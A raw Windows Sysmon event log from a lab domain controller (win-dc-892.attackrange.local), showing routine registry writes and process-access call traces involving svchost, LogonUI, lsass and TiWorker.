12:02:11.248{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\SentUpdateToIpBinary Data 13241300x80000000000000004224Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:11.248{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\DnsServersBinary Data 13241300x80000000000000004223Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 
12:02:11.248{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\HostAddrsBinary Data 13241300x80000000000000004222Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:11.248{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\PrimaryDomainNameattackrange.local 13241300x80000000000000004221Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:11.248{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\AdapterDomainName(Empty) 13241300x80000000000000004220Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:11.248{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\Hostnamewin-dc-892 13241300x80000000000000004219Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:11.248{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\RegisteredSinceBootDWORD (0x00000001) 10341000x80000000000000004218Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.171{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000004217Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.155{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000004216Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.155{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004215Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.155{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004214Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.155{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000004213Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2021-03-31 12:02:11.155{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Enum\SWD\ScDeviceEnumBus\1\FriendlyNameMicrosoft Passport Container Enumeration Bus 13241300x80000000000000004212Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localInvDB-DriverVerSetValue2021-03-31 12:02:11.139{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Control\Class\{62f9c741-b25a-46ce-b54c-9bccce08b6f2}\0003\DriverVersion10.0.14393.0 13241300x80000000000000004211Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2021-03-31 12:02:11.139{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Enum\SWD\ScDeviceEnumBus\0\FriendlyNameSmart Card Device Enumeration Bus 13241300x80000000000000004210Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localInvDB-DriverVerSetValue2021-03-31 
12:02:11.139{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Control\Class\{62f9c741-b25a-46ce-b54c-9bccce08b6f2}\0002\DriverVersion10.0.14393.0 10341000x80000000000000004209Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.108{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004208Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.108{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004207Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.108{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|c:\windows\system32\lsm.dll+23c29|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004206Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.108{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004205Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.108{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23c18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004204Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.108{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|c:\windows\system32\lsm.dll+1fc37|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004203Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.108{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1fb39|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004202Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.108{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004201Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.108{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004200Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.108{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004199Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.108{266CAFBE-646C-6064-0F00-00000000AE01}11164376C:\Windows\System32\svchost.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\termsrv.dll+a1087|c:\windows\system32\termsrv.dll+6aa58|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004198Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.108{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004197Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.108{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004196Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:11.108{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004195Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.108{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004194Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
